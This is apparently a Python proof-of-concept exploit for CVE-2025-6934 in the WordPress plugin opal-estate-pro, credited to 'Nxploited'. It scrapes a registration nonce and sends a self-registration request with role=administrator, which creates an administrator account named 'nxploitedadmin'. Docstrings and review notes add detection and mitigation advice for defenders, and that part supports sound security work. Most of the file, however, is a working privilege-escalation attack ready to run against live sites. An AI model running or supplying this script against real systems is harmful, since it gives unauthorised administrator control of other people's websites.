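"""Proof-of-concept for CVE-2025-6934 in the WordPress plugin ``opal-estate-pro``.

What the code below does:

1. ``check_version`` reads the plugin's public ``readme.txt`` and compares its
   ``Stable tag`` with 1.7.5, the last release this script treats as affected.
2. ``get_nonce`` scrapes the ``opalestate-register-nonce`` hidden field from
   the page at the given URL.
3. ``exploit`` posts a registration to ``/wp-admin/admin-ajax.php`` with
   ``action=opalestate_register_form`` and ``role=administrator``.

Notes for defenders, derived from the requests this script sends:

* The request only succeeds if the registration handler honours a
  client-supplied ``role`` field; the role of a self-registered account should
  be fixed server-side.
* Detection: POSTs to ``/wp-admin/admin-ajax.php`` whose body carries
  ``action=opalestate_register_form`` together with a ``role`` parameter, and
  administrator accounts nobody created on purpose (this script hard-codes the
  username ``nxploitedadmin``).
* Mitigation: move the plugin to a release newer than 1.7.5 (confirm the fixed
  version in the vendor advisory) and audit existing administrator accounts.
"""
import argparse
import requests
import re
import time
from urllib.parse import urljoin
from bs4 import BeautifulSoup
import json

# By: Khaled_alenazi (Nxploited)

# NOTE(review): every request below is sent with verify=False and the matching
# urllib3 warning is silenced here, so no server certificate is authenticated.
# A version verdict obtained this way can be altered by anyone on the network
# path; do not treat it as authoritative.
requests.packages.urllib3.disable_warnings()

user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
headers = {"User-Agent": user_agent}

# Last plugin release this script treats as affected.
LAST_AFFECTED_VERSION = (1, 7, 5)


def _version_tuple(version):
    """Convert a dotted version string such as "1.7.10" into a tuple of ints."""
    return tuple(int(part) for part in version.split(".") if part)


def _is_affected(version):
    """Return True when *version* is numerically <= LAST_AFFECTED_VERSION.

    Both sides are zero-padded to the same length so that "1.7.5.0" compares
    equal to "1.7.5" and "1.7" compares as "1.7.0".
    """
    parsed = _version_tuple(version)
    width = max(len(parsed), len(LAST_AFFECTED_VERSION))
    padded = parsed + (0,) * (width - len(parsed))
    limit = LAST_AFFECTED_VERSION + (0,) * (width - len(LAST_AFFECTED_VERSION))
    return padded <= limit


def check_version(base_url):
    """Print whether the plugin version advertised in readme.txt is affected.

    Args:
        base_url: Base URL of the WordPress site to check.

    The verdict rests only on the ``Stable tag`` line of the plugin's
    ``readme.txt``. That file can be stale, edited or removed, so a missing or
    newer tag is not proof that the installation is patched.
    """
    readme_url = urljoin(base_url, "/wp-content/plugins/opal-estate-pro/readme.txt")
    try:
        response = requests.get(readme_url, verify=False, timeout=10)
        if response.status_code == 200:
            match = re.search(r"Stable tag:\s*([\d\.]+)", response.text)
            if match:
                version = match.group(1)
                print("\n[•] Plugin Version Check:")
                # Compare numerically: as plain strings "1.10.0" sorts before
                # "1.7.5" and "1.7.10" would be misjudged the same way.
                if _is_affected(version):
                    print(f" [+] Vulnerable version detected: {version}")
                else:
                    print(f" [-] Version may not be vulnerable: {version}")
            else:
                print(" [-] Stable tag not found in readme.txt")
        else:
            print(" [-] Could not access readme.txt")
    except Exception as e:
        print(f" [-] Error: {e}")


def get_nonce(base_url):
    """Return the ``opalestate-register-nonce`` field value, or None.

    Args:
        base_url: URL of the page expected to contain the registration form.

    Returns:
        The ``value`` attribute of the hidden input, or None when the field is
        absent or the request/parsing fails.
    """
    try:
        response = requests.get(base_url, verify=False, timeout=10, headers=headers)
        soup = BeautifulSoup(response.text, "html.parser")
        input_tag = soup.find("input", {"name": "opalestate-register-nonce"})
        if input_tag:
            return input_tag.get("value")
        return None
    except Exception:
        # Was a bare ``except:``, which also swallowed KeyboardInterrupt and
        # SystemExit and made the script impossible to abort at this point.
        return None


def exploit(base_url, email, password):
    """Submit the registration request and report the server's answer.

    Args:
        base_url: Base URL of the WordPress site.
        email: Email address placed in the registration form.
        password: Password placed in the registration form.

    Success is judged solely by ``status`` being True in the JSON reply.
    """
    print("\n[•] Exploit Attempt Started")
    nonce = get_nonce(base_url)
    if not nonce:
        print(" [-] Failed to retrieve nonce")
        return
    print(f" [+] Nonce Found: {nonce}")

    target = urljoin(base_url, "/wp-admin/admin-ajax.php")
    # The ``role`` field is the security-relevant part of this form: a handler
    # that copies it into the new account lets the client choose its own
    # privilege level. These field names are what to look for in request logs.
    data = {
        "username": "nxploitedadmin",
        "email": email,
        "password": password,
        "password1": password,
        "role": "administrator",
        "confirmed_register": "on",
        "opalestate-register-nonce": nonce,
        "_wp_http_referer": "/",
        "ajax": "1",
        "action": "opalestate_register_form"
    }

    try:
        response = requests.post(target, data=data, verify=False, headers=headers)
        print(f" [+] HTTP Status: {response.status_code}")
        try:
            result = response.json()
            if result.get("status") is True:
                print("\n[✔] Exploit Successful!")
                print(" --------------------------")
                print(" Username : nxploitedadmin")
                print(f" Email : {email}")
                # NOTE(review): the password is echoed to stdout and was also
                # given on the command line, so it ends up in terminal
                # scrollback, shell history and the process list.
                print(f" Password : {password}")
                print(" Role : administrator")
                print(" --------------------------")
            else:
                print("\n[✖] Exploit Failed!")
                message = result.get("message", "")
                # The server message is HTML; reduce it to plain text.
                clean_msg = BeautifulSoup(message, "html.parser").get_text().strip()
                print(f" Reason: {clean_msg}")
        except json.JSONDecodeError:
            print("\n[✖] Unexpected response (non-JSON):")
            print(response.text)
    except Exception as e:
        print(f" [-] Exploit Error: {e}")

    # NOTE(review): the source arrived with its line breaks stripped; this
    # credit line is assumed to close exploit() rather than run at import time.
    print("\nExploit By: Khaled_alenazi (Nxploited) | https://github.com/Nxploited")


def main():
    """Parse the command line, run the version check, then the request."""
    parser = argparse.ArgumentParser(description="CVE-2025-6934 Exploit by Khaled Alenazi (Nxploited)")
    parser.add_argument("-u", "--url", required=True, help="Target URL (e.g., http://site.com/path/)")
    parser.add_argument("-mail", "--newmail", required=True, help="Email to register as admin")
    parser.add_argument("-password", "--newpassword", required=True, help="Password for new admin user")
    args = parser.parse_args()

    check_version(args.url)
    exploit(args.url, args.newmail, args.newpassword)


if __name__ == "__main__":
    main()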